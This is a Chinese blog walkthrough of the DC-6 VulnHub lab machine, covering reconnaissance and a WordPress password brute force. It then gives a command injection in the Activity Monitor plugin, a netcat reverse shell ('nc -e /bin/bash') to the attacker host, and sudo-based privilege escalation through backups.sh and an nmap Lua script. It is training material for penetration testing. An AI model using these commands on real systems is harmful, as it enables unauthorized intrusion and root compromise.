DC-6 靶场演练

最新推荐文章于 2024-08-07 08:45:00 发布

z_hunter

最新推荐文章于 2024-08-07 08:45:00 发布

阅读量774

点赞数

分类专栏： CTF

本文链接：https://blog.csdn.net/LZHPIG/article/details/104653809

版权

CTF 专栏收录该内容

15 篇文章 1 订阅

订阅专栏

Stand Out Fit In

0x00 环境准备

Kali Linux（IP：10.10.16.128）
DC-6 靶机
NAT 网络连接

0x01 主机发现

fping -g 10.10.16.0/24

得到靶机的 IP：10.10.16.149
在这里插入图片描述

0x02 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.149

得到 22/80 端口
在这里插入图片描述

0x03 目录爆破

dirb http://10.10.16.149

得到 wp-admin/wp-content/wp-includes 目录
在这里插入图片描述

0x04 漏洞挖掘

1. 靶机访问

发现页面重定向到 http://wordy

Hosts文件主要作用是定义IP地址和主机名的映射关系，是一个映射IP地址和主机名的规定。
当用户在浏览器中输入一个需要登录的网址时，系统会首先自动从 Hosts 文件中寻找对应的 IP 地址，一旦找到，浏览器会立即打开对应网页，如果没有找到，则浏览器会将网址提交 DNS 服务器进行 IP 地址解析。

在这里插入图片描述
很明显，在本地的 hosts 文件中没有对靶机的地址和 worrdy 域名做一个映射，DNS 服务器也无法进行 IP 地址解析，所以需要在 hosts 文件中对其添加如下的映射

10.10.16.149 wordy

windows 下的 hosts 文件路径为 C:\Windows\System32\drivers\etc\hosts ，hosts 文件一定是在系统盘里，且需要管理员权限才能操作，可以先以管理员权限打开记事本，再通过记事本打开 hosts 文件，添加地址的映射。
Linux 下的 hosts 文件在 /etc/hosts
在这里插入图片描述

2. 目录访问

发现 /wp-admin 重定向到一个用户登录界面
在这里插入图片描述

3. 网站扫描

由 wappalyzer 插件得知该网站为 WordPress 搭建的博客系统。
在这里插入图片描述
可以使用 wpscan 或 cmsmap 对 WordPress 搭建的网站进行漏扫。

wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate u

下面是 wpscan 使用的几个参数的作用
在这里插入图片描述
插件和主题的漏洞没扫着，但得到几个 wordpress 建站的常见用户名，将其保存在文件夹 zhutou.txt 中以便后面利用。

在 vulnhub 中作者提供了一条线索，意为将 Kali 自带的 rockyou.txt 字典中包含有 k01 的字符串挑选出来，保存在 passwords.txt 文件中

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

在这里插入图片描述
wpscan 爆破，得到一个用户名/密码：mark/helpdesk01

wpscan --url http://wordy -P passwords.txt -U 桌面/zhutou.txt

在这里插入图片描述
将得到的用户名/密码在前面目录扫描得到的用户登录界面登录，在 Activity monitor – Activity monitor – Tools – IP or integer 的输入框中，由于后台没有对用户输入参数进行过滤或过滤不严，导致用户可以任意数据，直接造成远程代码执行漏洞
在这里插入图片描述

127.0.0.1 | ls

在这里插入图片描述

0x05 漏洞利用

先在 Kali 使用 netcat 监听端口，再在 burpsuite 中反弹 shell

127.0.0.1 | nc -e /bin/bash 10.10.16.128 666

在这里插入图片描述

在 /home/mark/stuff/things-to-do.txt 得到另一个用户的密码
用户切换 su，查看当前用户的权限，发现可以以 jens 用户的权限操作 /home/jens 目录下的 backups.sh 文件
进入 /home/jens 目录下，在 backups.sh 文件末尾添加 /bin/bash ，当执行 backups.sh 文件时可切换至 jens 用户

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述

继续查看 jens 用户下可有什么权限，发现可以免密使用 root 权限执行 /usr/bin/nmap
nmap 可以执行脚本文件，可以创建一个文件并写入反弹 shell 的命令，因为这是以 root 权限执行，所以反弹的 shell 也应该是 root 权限

echo 'os.execute("/bin/sh")' > shell
sudo -u root nmap --script=shell

在这里插入图片描述

补充：

反弹 shell 的另一种方式使用 Poc，原理与上面相同，就是利用的途径有所不同
寻找有关 activity monitor 插件的漏洞 exp ，将其拷贝到 /tmp 目录下，开启 http 服务，以便浏览器访问 poc

searchsploit activity monitor
cp /usr/share/exploitdb/exploits/php/webapps/45274.html /tmp
cd /tmp
python -m SimpleHTTPServer 80

在这里插入图片描述

浏览器访问 poc ，在 Kali 先开启监听，点击 Submit request，即可反弹 shell 成功

http://10.10.16.128/45274.html

在这里插入图片描述

                                                                                                                                           猪头
                                                                                                                                         2020.3.4